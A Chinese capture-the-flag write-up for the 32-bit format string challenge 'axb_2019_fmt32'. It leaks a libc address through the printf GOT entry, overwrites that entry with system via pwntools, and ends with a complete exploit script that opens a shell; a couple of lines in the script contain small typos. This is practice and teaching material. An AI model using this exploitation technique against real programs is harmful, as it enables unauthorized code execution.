axb_2019_fmt32
步骤:
- 例行检查,32位程序,开启了nx保护
- 本地试运行一下程序,看看大概的情况
- 32位ida载入
alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程
25行,明显的格式化字符串漏洞
这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址
s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据
利用过程:
- 首先找一下我们输入的参数在栈上的相对位置,如图,补了一个字母‘B’之后偏移为8
找到偏移量后可以来泄露libc版本了
payload = 'A' + p32(printf_got)+ 'B' + '%8$s'
#‘A’ 是用来补位的,这样后面的printf函数的got表地址就会在栈上相对距离为8的位置
#‘B’ 相当于标记位,下面在接收数据的时候,接收到字符‘B’,后面跟着的就是我们泄露出来的函数地址
#%8$s 利用格式化字符串漏洞的%8$s去泄露出栈上相对距离为8的地址上的值
关于格式化字符串漏洞的原理,利用,格式化字符,看该文章
2. 在得到libc基址后,就可以算出程序里的system函数地址了
payload = 'A' + p32(printf_got)+ 'B' + '%8$s'
r.sendafter("Please tell me:",payload)
r.recvuntil('B')
printf_addr = u32(sh.recv(4))
print(hex(printf_addr))
libc = LibcSearcher('printf', printf_addr)
libcbase = printf_addr - libc.dump('printf')
system_addr = libcbase + libc.dump('system')
- 我们接下来要做的就是把利用fmtstr_payload,将printf的地址改为了system的地址,这边用的pwntools的工具,我简单解释一下,关于工具的具体情况,看这篇文章
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)
第一个参数表示格式化字符串的偏移
第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress};
第三个参数表示已经输出的字符个数
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写
payload='a'+fmtstr_payload(8,{printf_got:system},write_size = "byte",numbwritten = 0xa)
0xa=1(payload前面的a)+9(repeater:的长度)
之后传入 ‘/bin/sh’ 即可以获取shell
完整exp
from pwn import *
from LibcSearcher import *
context(os='linux',arch='i386',log_level='debug')
#r = process("./axb_2019_fmt32")
r = remote("node3.buuoj.cn","27499")
elf=ELF("./axb_2019_fmt32")
printf_got = elf.got['printf']
payload = 'a' + p32(printf_got) +'22'+ '%8$s'
r.sendafter('me:', payload)
r.recvuntil("22")
printf_addr = u32(r.recv(4))
print "printf_addr"+hex(printf_addr)
libc=LibcSearcher('printf',printf_addr)
libc_base=printf_addr-libc.dump('printf')
system=libc_base+libc.dump('system')
print "system_addr"+hex(system)
payload='a'+fmtstr_payload(8,{printf_got:system},write_size = "byte",numbwritten = 0xa)
#p.recvuntil(':')
r.sendline(payload)
r.sendline(';/bin/shx00')
r.interactive()
libc选13
参考wp:https://www.yuque.com/u239977/cbzkn3/nu76pp
百度过程中发现原题是道盲打,贴一下盲打的链接,本人太菜,没太搞明白
https://www.anquanke.com/post/id/196722#h3-4